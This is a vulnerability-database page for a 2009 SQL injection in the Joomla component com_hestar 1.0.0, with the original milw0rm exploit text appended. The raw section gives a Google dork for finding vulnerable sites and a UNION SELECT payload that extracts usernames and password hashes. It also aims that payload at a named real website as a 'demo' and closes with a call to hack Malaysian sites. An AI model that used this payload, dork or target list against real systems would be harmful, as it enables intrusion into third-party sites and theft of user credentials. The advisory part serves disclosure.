com_hestar 1.0.0

vendor:

com_hestar

by:

M3NW5

7.5

CVSS

HIGH

SQL injection

CWE

Product Name: com_hestar

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: YES

Related CWE: N/A

CPE: a:netvistun:com_hestar

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Joomla! CMS

2009

An SQL injection vulnerability exists in the com_hestar component 1.0.0 for Joomla! CMS. A remote attacker can send a specially crafted request to the index.php script with the option parameter set to com_hestar and the task parameter set to showlist, and an id parameter set to a malicious SQL statement, which will execute arbitrary SQL commands in the context of the application.

Mitigation:

Upgrade to the latest version of com_hestar component.

Source

Exploit-DB raw data:

#############################################################################################################
## com_hestar 1.0.0		   	     								   ##
## Author   : M3NW5 (M3NW5[at]hackermail[dot]com) 							   ##
## Homepage : http://www.indonesiancoder.com    	     					    	   ##
## Date	    : Monday, Semptember 07, 2009     								   ##
## ------------------------------------------------------------------------------------------------------- ##
## _______            __                              __                 ______            __              ##
##|_     _|.-----..--|  |.-----..-----..-----..-----.|__|.---.-..-----. |      |.-----..--|  |.-----..----.##
## _|   |_ |     ||  _  ||  _  ||     ||  -__||__ --||  ||  _  ||     | |   ---||  _  ||  _  ||  -__||   _|##
##|_______||__|__||_____||_____||__|__||_____||_____||__||___._||__|__| |______||_____||_____||_____||__|  ##
##													   ##
## ------------------------------------------------------------------------------------------------------- ##
#############################################################################################################

[ Software Information ]

[+] Software      : com_hestar
[+] Version	  : 1.0.0
[+] Provider	  : Netvistun - netvistun@netvistun.is 
[+] Web Provider  : www.netvistun.is
[+] Vulnerability : SQL injection
[+] Google Dork   : inurl:"com_hestar"

#############################################################################################################
[ POC ]

http://127.0.0.1/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--


[ Demo ]

http://www.arbae.is/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
#############################################################################################################

[ Greetings ]

[+] All of Indonesian Coder Member, Don Tukulesto, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut,
    Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom

[ SHOUT ]

STILL FVCKED TO MALAYSIA, TRULLY THIEF COUNTRY IN ASIA.
Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!!

[ Special to ]

Anggie Lestari Putri sulung dari keluarga bapak dodi dan ibu dini ^^ i lope yu pull...

# milw0rm.com [2009-09-09]